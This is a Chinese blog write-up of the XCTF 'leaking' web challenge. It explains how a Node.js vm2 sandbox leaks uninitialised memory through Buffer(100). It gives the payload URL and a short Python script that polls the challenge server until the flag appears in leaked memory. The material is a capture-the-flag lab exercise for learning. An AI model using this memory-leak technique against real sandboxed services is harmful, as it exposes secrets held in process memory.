xctf攻防世界 Web高手进阶区 leaking

最新推荐文章于 2022-09-01 09:23:31 发布
最新推荐文章于 2022-09-01 09:23:31 发布
阅读量1.6k 收藏 1
点赞数 2
分类专栏: 攻防世界web之路 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l8947943/article/details/122267074
版权

1. 进入环境,查看内容,给了一堆代码

在这里插入图片描述
看到基本的代码格式,还有其中var { VM } = require(“vm2”);,这是Node.js的代码。其中也给了一句注释:

 /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
 eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\";")

提示flag在文中,且使用eval()函数去执行得到函数。猜测一整,大写的懵逼,默默开始参考大神。。。

2. 解题

  1. 题目的意思是leaking(泄露),一开始我以为是内存泄漏,无奈对前端知道太少,看到大神们写到:var { VM } = require(“vm2”);,得知是Node.js 官方安全沙箱的库。
    丫的,又到了知识盲区,遂查阅相关资料:

  2. 思考如何做到泄露
    参考大佬的博客我们可以在沙箱里面执行任意的命令,那我们如何逃逸出去呢?

在较早一点的 node 版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。

  1. 整理思路
  • 题目通过访问得到了一串代码,这段代码提示在沙箱中执行。
  • 由于沙箱的隔离机制,无法执行eval()等操作系统的函数。
  • 要拿到flag则需要让eval()执行。如何让它执行?
  • 利用逃逸沙箱漏洞,从而得到flag。
  1. 尝试hackbar构造payload玩一玩
 http://111.200.241.244:57300/?data=Buffer(100)

在这里插入图片描述

得到下载文件,是一串乱码,如图:
在这里插入图片描述

  1. 尝试脚本
    看了看其他人解题思路,通过脚本,找到内存泄漏时执行的eval()函数,得到flag。
import requests

url = ' http://111.200.241.244:57300/?data=Buffer(100)'

while True:
    res = requests.get(url)
    print(res.status_code)

    if 'flag{' in res.text:
        print(res.text)
        break

如图:
在这里插入图片描述
flag{4nother_h34rtbleed_in_n0dejs}

3. 总结

  • 考察Node.js
  • 沙箱和vm2的逃逸
  • 代码审计

还是好难,不熟悉Node.js,又是跪着做题的一天。。。如有问题,欢迎留言讨论!

l8947943
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XCTF攻防世界web.doc
09-19
0x01 view-source 【题目描述】 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 【目标】 学会查看源代码 【工具】 firefox浏览器 【分析过程】 可以通过view-source:的方法来访问源码:html view-source:http://10.10.10.175:32796 在url中提交后便可访问页面源码,在源码中可找到flag。
XCTF1-web ics-06 POST&GET inget
orchid_sea的博客
11-16 213
云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?查看源码和响应没有flag,修改任何日期也没有响应。尝试GET注入,测试注入点时,可以得到flag。传入参数a=1后,提示继续POST提交参数。爆破出来,当id=2333时,长度不同。使用HackBar工具提交POST参数。发现存在GET参数id,尝试爆破。该位置提示存在flag。提示从GET方式注入。
re刷题第十一天
Prowes5的博客
09-24 428
re刷题第十一天 0x00 catch-me 解压两次,载入IDA,发现大部分位SSE和AVX指令,F5不太好识别,动态调试一下吧 其实最重要的是上图这个验证,v3为0xb11924e1,我们需要输入0x4ff2da0a,来通过这个check,但是问题来了,怎么在shell里边插入十六制不可见字符的环境变量。 上网查了一下,学到了 export ASIS="$(printf "\x0a\x...
xctf新手(附详细过程)
qq_39670065的博客
09-15 2426
攻防世界
攻防世界 reverse leaked-license-64
09-05 596
mark一下,以后分析 原文:http://sibears.ru/labs/ASIS-CTF-Quals-2016-Leaked_License/ [ASIS CTF Quals 2016] - 泄露许可证[64] GROKE,2016年5月9日 我从朋友的朋友的老兄那里借了这个软件许可证和图书馆!如果我可以伪造今年竞争计算机ID的许可证,那就太好了。 ...
XCTF IgniteMe
YenKoc的博客
03-22 420
一.查壳 结论: 1.用vc++编译的。 2.无壳,毕竟是一分的题 二.点击运行,发现不是爆破,而是找出注册机,汇编功力还在提升中,只能拖入ida来静态调试了 具体的见注释: 二.1点击入关键函数 注意!这里有个坑, 将125转换成字符, 说明最后一个字符是}这点,可能会被很多人给忽视了,三分逆向,七分猜2333 三.见注释 四.脚本上: v7="GONDPHyGjPEKruv{{...
攻防世界--fileclude && fileinclude && inget && easytornado
08-25 2089
file2中包含数据file_get_contents。直接访问flag.php只显示WRONG WAY!说明flag应该在flag.php的注释里。file2使用php伪协议传数据。两个参数file1和file2。
XCTF 攻防世界WEB 高手 Cat
weixin_45844670的博客
08-26 574
题目链接https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4658&page=2 【说在前面】:这道题需要的知识有flask,django等知识,所以部分知识我是从其他wp看的,(相关知识仍在补充中 【相关知识】: php cURL CURLOPT_SAFE_UPLOAD django DEBUG mode Django使用的是gbk编码,超过%7F的编码不在gbk中有意义 当 CURL
攻防世界-Reverse-Hellp,CTF
chiquanji1260的博客
07-07 182
拿到一个.exe的文件,还是peid看一下,嗯,无壳,直接od 单步跟踪到此,要求输入flag,我们输入abcd 然后出现字符串的对比,如果超了会直接over的,对于repnescas byteptres:[edi]我也写了篇小博客来说明 继续向下走,出现循环,是把输入的...
攻防世界 reverse parallel-comparator-200
09-18 495
parallel-comparator-200school-ctf-winter-2015 https://github.com/ctfs/write-ups-2015/tree/master/school-ctf-winter-2015/reverse/parallel-comparator-200 linux平台,mark,以后解决。 给出了源代码,关键在于checking函...
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
2019XCTF攻防世界之萌新入坑
weixin_44113469的博客
04-06 1606
XCTF攻防世界的题质量确实很高,还有解题思路和writeup,真是棒极了。 萌新入坑 0x01 babystack 保护机制 题目开启了nx,canary 题目代码 思路分析 ①这道题主要是绕过canary,然后栈溢出getshell。 ②经分析,read函数读入到s处,可以溢出。 ③put函数输出s的内容,遇到’\x00’才停止,即使字符串中存在’\n’,也会继续输出,用...
攻防世界-Reverse-Python-trade
chiquanji1260的博客
07-07 528
拿到的是一个.pyc的文件,在线Python反编译后如下: https://tool.lu/pyc/ import base64 def encode(message): s = '' for i in message: x = ord(i) ^ 32 ...
攻防世界Web(难度1)
weixin_59453707的博客
08-30 415
将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串将字符串转换为状态信息PHP内的几个特殊魔术方法__construct():当对象创建(new)时会自动调用,但在unserialize()时是不会自动调用的(构造函数)__destruct():当对象操作执行完毕后自动执行destruct()函数的代码。...
攻防世界WEB练习-inget
热门推荐
不知名白帽的博客
09-01 1万+
攻防世界WEB练习-inget
攻防世界traffic
最新发布
07-28
很抱歉,我无法理解你的问题。请提供更多的上下文或明确的问题,以便我能够帮助你。 #### 引用[.reference_title] - *1* *2* [xctf攻防世界 Web高手 easytornado](https://blog.csdn.net/l8947943/article/details/126174257)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [攻防世界1](https://blog.csdn.net/charon145/article/details/121129480)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

l8947943

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值